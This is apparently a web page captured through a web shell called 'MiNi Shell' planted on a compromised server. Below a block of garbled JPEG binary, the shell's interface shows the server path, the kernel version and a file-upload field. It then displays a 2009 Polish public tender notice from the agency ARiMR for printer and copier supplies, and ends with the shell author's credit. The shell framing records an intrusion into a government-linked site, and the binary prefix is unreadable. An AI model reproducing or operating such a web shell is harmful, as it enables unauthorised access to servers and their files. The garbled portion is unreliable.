JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090416/107316-N-2009.html

<p class="kh_header"><b>Ciecierzyn: Dostawa artykułów eksploatacyjnych do drukarek, kopiarek i faksów dla Lubelskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa</b><br>
<b>Numer ogłoszenia: 107316 - 2009; data zamieszczenia: 16.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Lubelski Oddział Regionalny , Elizówka 65A, 21-003 Ciecierzyn, woj. lubelskie, tel. 081 7568810, faks 081 7563941.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna - agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów eksploatacyjnych do drukarek, kopiarek i faksów dla Lubelskiego Oddziału Regionalnego Agencji Restrukturyzacji i Modernizacji Rolnictwa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Na przedmiot zamówienia składa się dostawa, rozładunek i wniesienie artykułów eksploatacyjnych do drukarek, kopiarek i faksów (dalej: artykułów eksploatacyjnych) do pomieszczeń wskazanych przez Zamawiającego w siedzibie Lubelskiego Oddziału Regionalnego Agencji Restrukturyzacji 
i Modernizacji Rolnictwa oraz odbiór po wykorzystaniu przez Zamawiającego artykułów eksploatacyjnych (dalej:zużytych artykułów eksploatacyjnych). 
Oferowane artykuły eksploatacyjne muszą być:
fabrycznie nowe - za które należy uznać artykuły bez śladów używania i uszkodzenia, pełnowartościowe, nie regenerowane, nie refabrykowane i do których produkcji zostały wykorzystane wyłącznie elementy/półprodukty w 100% nowe, nie pochodzące z recyklingu, bez śladów poprzedniego używania i uszkodzenia, nie wchodzące wcześniej (pierwotnie) w części ani w całości w skład innych artykułów. 
artykuły oryginalne - za które należy uznać artykuły eksploatacyjne wyprodukowane przez producentów urządzeń, w których mają być stosowane, nie będące naśladownictwem lub przeróbką, nie fałszowane lub artykuły równoważne za które należy uznać artykuły fabrycznie nowe, czyli przy ich produkcji musi być wykorzystane 100% nowych części, w pełni kompatybilne ze sprzętem, do którego są zamówione, których jakość, parametry techniczne, w tym wydajność, jest co najmniej taka, jak materiałów oryginalnych. Żadna z części np. kaseta, bęben światłoczuły, obudowa, listwa podająca, listwa zbierająca, wałek magnetyczny, głowica drukująca, toner, atrament, tusz oraz pozostałe części, nie były wykorzystywane w formie pierwotnej w całości lub w części w innym produkcie. Materiały nie mogą mieć śladów poprzedniego używania i uszkodzenia, nie regenerowane, nie prefabrykowane pochodzące z bieżącej produkcji.
2.Dostarczone artykuły eksploatacyjne muszą posiadać znak firmowy producenta i etykiety zawierające numer katalogowy oraz być dostarczone w nienaruszonych, fabrycznie oznakowanych opakowaniach umożliwiających identyfikację z oznaczeniem producenta, wraz z symbolem artykułu eksploatacyjnego (tonera,tuszu) oraz przeznaczeniem, szczelnie zamknięte.
3.Szczegółowy opis przedmiotu zamówienia określa Załącznik nr 1 do SIWZ.
4.Zamawiający nie dopuszcza dostarczenia artykułów eksploatacyjnych regenerowanych, ani refabrykowanych.
5.Wykonawca jest zobowiązany dołączyć do oferty dokument (deklarację) potwierdzającą, że wymagana minimalna wydajność oraz jakość wydruku artykułu dot. pozycji Lp. od 3 do 8 Wykazu rodzajowego
 i ilościowego przedmiotu zamówienia załącznika nr 1 do SIWZ została potwierdzona na podstawie testów przeprowadzonych zgodnie z normą ISO-IEC 19752.
6.Udowodnienie równoważności artykułów eksploatacyjnych leży po stronie Wykonawcy. Wykonawca składający ofertę na artykuły równoważne zobowiązany jest wpisać w tabeli formularza ofertowego nazwę, oznaczenie, wydajność i producenta danego materiału równoważnego oraz przedstawić dokumenty potwierdzające jego równoważność.
7.W przypadku, gdy produkt oryginalny posiada inteligentny układ elektroniczny (chip) przekazujący informacje o stanie zużycia tuszu lub tonera, należy dostarczyć oświadczenie, że produkt równoważny posiada układ analogicznie działający.

8.Sprzedaż artykułów eksploatacyjnych realizowana będzie na podstawie zamówień cząstkowych składanych przez Zamawiającego w okresie od dnia zawarcia umowy do 30 listopada 2009 roku. Zamówienie będzie realizowane do wystąpienia pierwszego zdarzenia tj. wyczerpania zamówionego asortymentu lub do wyczerpania środków finansowych przeznaczonych na realizację przedmiotu zamówienia, w obu przypadkach zamówienie będzie realizowane nie dłużej niż do 30 listopada 2009 roku, z zastrzeżeniem że odbiór zużytych artykułów eksploatacyjnych nastąpi do 31.12.2010 r. Dostawy odbywać się będą do siedziby zamawiającego, tj. Lubelskiego Oddziału Regionalnego mieszczącego się w Elizówce 65A k-Lublina, 21-003 Ciecierzyn. Dostawa i odbiory muszą odbyć się 
do 7 dni kalendarzowych od daty przesłania każdorazowego zamówienia przez Zamawiającego w dniach roboczych Zamawiającego, tj. od poniedziałku do piątku w godzinach pracy biura 
tj. poniedziałek - piątek 08:15 - 16:00 z wyłączeniem dni ustawowo wolnych od pracy.
9.Odbiór zamówionych przez Zamawiającego artykułów eksploatacyjnych oraz wydawanie zużytych artykułów eksploatacyjnych, zostanie każdorazowo potwierdzony w formie protokołu odbioru/wydania podpisanego przez upoważnionych przedstawicieli obu stron i sporządzonych wg wzoru stanowiącego załącznik nr 2 do Umowy. Protokół odbioru stwierdzający prawidłowe wykonanie umowy stanowi podstawę do wystawienia faktury VAT.
10.W przypadku stwierdzenia, że dostarczone artykuły eksploatacyjne:
a)są niezgodne z zamówieniem lub nie są kompletne,
b)posiadają ślady zewnętrznego uszkodzenia,
c)posiadają ślady uprzedniej eksploatacji,
d)posiadają istotne wady obniżające ich wartość lub uniemożliwiające włączenie ich do normalnej eksploatacji, 
Zamawiający odmówi odbioru części lub całości artykułów eksploatacyjnych, sporządzając protokół zawierający przyczyny odmowy odbioru. Zamawiający wyznacza termin dostarczenia artykułów eksploatacyjnych fabrycznie nowych, wolnych od wad. Procedura czynności odbioru zostanie powtórzona.
11.Wykonawca udzieli Zamawiającemu gwarancji na artykuły eksploatacyjne na okres min. 12 miesięcy. Za każdym razem termin gwarancji w stosunku do przedmiotu poszczególnej sprzedaży biegnie od daty protokolarnego przejęcia jej przedmiotu.
12.Artykuły eksploatacyjne muszą być wyprodukowane po 01.01.2008r.
13.Pozostałe istotne wymagania Zamawiającego co do przedmiotu zamówienia i realizacji umowy zostały zawarte we wzorze umowy stanowiącej załącznik nr 4 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.43.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział Wykonawcy, którzy:
1.1.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
1.2.Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
1.3.Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
1.4.Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.Wykluczeniu z postępowania o udzielenie zamówienia publicznego podlegają wykonawcy określeni w art. 24 ustawy Prawo zamówień publicznych.
3.Ocena spełniania powyższych warunków zostanie przeprowadzona zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach określonych w  SIWZ. 
Z treści załączonych dokumentów musi jednoznacznie wynikać, iż w/w warunki Wykonawca spełnił.
4.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. 
W takim przypadku oferta musi spełniać następujące wymagania:
a) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała do wszystkich Wykonawców występujących wspólnie;
b) Wykonawcy występujący wspólnie winni, zgodnie z art. 23 ust. 2 ustawy ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia publicznego;
c) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem;
d) Każdy z Wykonawców wchodzący w skład konsorcjum musi udokumentować, że nie podlega wykluczeniu na podstawie na podstawie art. 24 ust. 1 pkt 1-9 ustawy. Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy winno być podpisane przez pełnomocnika konsorcjum. 
5.Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom, a także podania nazw (firm) proponowanych podwykonawców. Wykonawca odpowiada za działania podwykonawców jak za swoje własne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wykonawcy ubiegający się o zamówienie muszą złożyć: 
1.1.Wypełniony formularz ofertowy (według załącznika nr 2 do SIWZ)
1.2.Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z wymaganiami art. 22 Ustawy (według Załącznika nr 3 do SIWZ). W przypadku powierzenia wykonania części lub całości zamówienia podwykonawcom, wykonawca zobowiązany jest do przedstawienia oświadczeń podwykonawców zgodnie z art. 22 ust 1 pkt. 2 Ustawy, złożonych nie później niż na dzień  składania ofert.
1.3.Pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym.
Wykonawcy ubiegający się o zamówienie w celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu, musza załączyć do oferty niżej wymagane oświadczenia lub dokumenty:
1.4.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
UWAGA: W przypadku złożenia oferty przez spółkę z o.o., w której zaoferowana cena przewyższa dwukrotnie wysokość kapitału zakładowego w chwili zawierania umowy wymagane będzie przedłożenie uchwały jej wspólników (chyba, że umowa spółki stanowi inaczej) 
o zgodzie na zaciągnięcie takich zobowiązań (Kodeks Spółek Handlowych art. 230). 
W przypadku złożenia oferty przez spółkę cywilną - umowa spółki.
1.5.Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
1.6.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.7.Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Wykonawcy w celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, muszą złożyć wraz z ofertą:
1.8.Wykonawca jest zobowiązany dołączyć do oferty dokument (deklarację) potwierdzającą, że wymagana minimalna wydajność oraz jakość wydruku artykułu dot. pozycji Lp. od 3 do 8 Wykazu rodzajowego i ilościowego przedmiotu zamówienia załącznika nr 1 do SIWZ została potwierdzona na podstawie testów przeprowadzonych zgodnie z normą ISO/IEC 19752.
1.9.W przypadku, gdy produkt oryginalny posiada inteligentny układ elektroniczny (chip) przekazujący informacje o stanie zużycia tuszu lub tonera, należy dostarczyć oświadczenie, że produkt równoważny posiada układ analogicznie działający (wymagany wyłącznie w przypadku zaoferowania materiałów równoważnych).

2.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1: 
2.1- ppkt 1.4, ppkt 1.5 i ppkt 1.7 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
2.2- ppkt 1.6 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy.
3.Dokumenty, o których mowa w pkt 2 ppkt 2.1 lit. a) i b) oraz ppkt 2.2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 2 ppkt 2.1 lit. c), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibą lub miejsce zamieszkania. Przepis pkt 3 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa
Lubelski Oddział Regionalny Elizówka 65A k/Lublina 21-003 Ciecierzyn
Biuro Oddziału Regionalnego (budynek A, parter, pokój 006A).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa
Lubelski Oddział Regionalny, Kancelaria LOR, budynek B, piętro I, pokój 130B
Elizówka 65B k/Lublina, 21-003 Ciecierzyn.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com